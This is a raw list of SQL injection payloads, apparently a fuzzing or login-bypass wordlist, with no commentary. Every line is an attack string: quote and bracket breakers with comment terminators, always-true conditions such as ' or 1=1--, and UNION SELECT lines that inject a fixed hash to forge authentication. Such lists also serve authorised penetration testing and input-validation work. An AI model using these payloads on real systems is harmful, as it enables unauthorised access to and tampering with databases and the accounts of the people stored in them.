'
"
)
')
")
))
)))
'--
"--
)--
')--
")--
))--
)))--
' --
" --
) --
') --
") --
)) --
))) --
'--+
"--+
)--+
')--+
")--+
))--+
)))--+
'--+-
"--+-
)--+-
')--+-
")--+-
))--+-
)))--+-
'-- -
"-- -
)-- -
')-- -
")-- -
))-- -
)))-- -
';
";
);
');
");
));
)));
';--
";--
);--
');--
");--
));--
)));--
'; --
"; --
); --
'); --
"); --
)); --
))); --
';--+
";--+
);--+
');--+
");--+
));--+
)));--+
';--+-
";--+-
);--+-
');--+-
");--+-
));--+-
)));--+-
';-- -
";-- -
);-- -
');-- -
");-- -
));-- -
)));-- -
'#
"#
)#
')#
")#
))#
)))#
' #
" #
) #
') #
") #
)) #
))) #
'# 
"# 
)# 
')# 
")# 
))# 
)))# 
';#
";#
);#
');#
");#
));#
)));#
'; #
"; #
); #
'); #
"); #
)); #
))); #
';# 
";# 
);# 
');# 
");# 
));# 
)));# 
'/*
"/*
)/*
')/*
")/*
))/*
)))/*
' /*
" /*
) /*
') /*
") /*
)) /*
))) /*
'/* 
"/* 
)/* 
')/* 
")/* 
))/* 
)))/* 
';/*
";/*
);/*
');/*
");/*
));/*
)));/*
'; /*
"; /*
); /*
'); /*
"); /*
)); /*
))); /*
';/* 
";/* 
);/* 
');/* 
");/* 
));/* 
)));/* 
'));/*
"));/*
'));--
"));--
'));-- -
"));-- -
'));--+-
"));--+-
)) -- -
')) -- -
")) -- -
)) -- 
')) -- 
")) -- 
)) --+
')) --+
")) --+   
'))#
"))#
'));#
"));#
' and 1='1
' and a='a
" and 1="1
" and a="a
") and 1=("1
") and a=("a
') and 1=('1
') and a=('a
) and 1=(1
) and a=(a
'-'
"-"
" "
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
1' --
1' #
1'/*
1' or '1'='1
1' or '1'='1'--
1' or '1'='1'#
1' or '1'='1'/*
1'or 1=1 or ''='
1' or 1=1
1' or 1=1--
1' or 1=1#
1' or 1=1/*
1') or ('1'='1
1') or ('1'='1'--
1') or ('1'='1'#
1') or ('1'='1'/*
1') or '1'='1
1') or '1'='1'--
1') or '1'='1'#
1') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT '1', '81dc9bdb52d04dc20036dbd8313ed055
1" --
1" #
1"/*
1" or "1"="1
1" or "1"="1"--
1" or "1"="1"#
1" or "1"="1"/*
1"or 1=1 or ""="
1" or 1=1
1" or 1=1--
1" or 1=1#
1" or 1=1/*
1") or ("1"="1
1") or ("1"="1"--
1") or ("1"="1"#
1") or ("1"="1"/*
1") or "1"="1
1") or "1"="1"--
1") or "1"="1"#
1") or "1"="1"/*
1' or 1.e(1) or '1'='1
1234 " AND 1=0 UNION ALL SELECT "1", "81dc9bdb52d04dc20036dbd8313ed055